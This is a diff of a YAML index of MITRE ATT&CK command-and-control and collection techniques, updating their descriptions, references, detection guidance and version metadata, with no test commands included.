-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -38027,7 +38492,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38052,8 +38517,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -38118,7 +38581,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -38142,7 +38604,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38167,21 +38629,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -38200,7 +38677,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -38214,6 +38691,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -38227,12 +38709,11 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests: []
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -38282,11 +38763,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -38295,20 +38775,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -38333,17 +38813,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests: []
   T1573:
@@ -38399,7 +38878,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -38424,7 +38902,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -38461,8 +38939,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -38516,7 +38992,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -38588,33 +39063,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -38622,23 +39076,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -38685,7 +39177,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -38745,7 +39236,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -38777,7 +39267,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -38803,8 +39293,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -38871,7 +39359,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests: []
   T1105:
@@ -38969,7 +39456,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests: []
   T1665:
@@ -39062,7 +39548,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -39086,7 +39571,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -39109,8 +39594,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -39135,7 +39618,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -39155,8 +39638,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -39210,7 +39691,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests: []
   T1102.001:
@@ -39235,7 +39715,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -39261,8 +39741,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -39316,7 +39794,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -39392,7 +39869,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests: []
   T1113:
@@ -39449,7 +39925,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests: []
   T1557:
@@ -39543,7 +40018,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -39622,7 +40096,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1602:
@@ -39661,7 +40134,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39676,30 +40149,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39708,13 +40161,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -39728,20 +40185,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39784,7 +40258,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -39809,7 +40282,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39829,22 +40302,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39861,11 +40336,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -39881,37 +40355,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
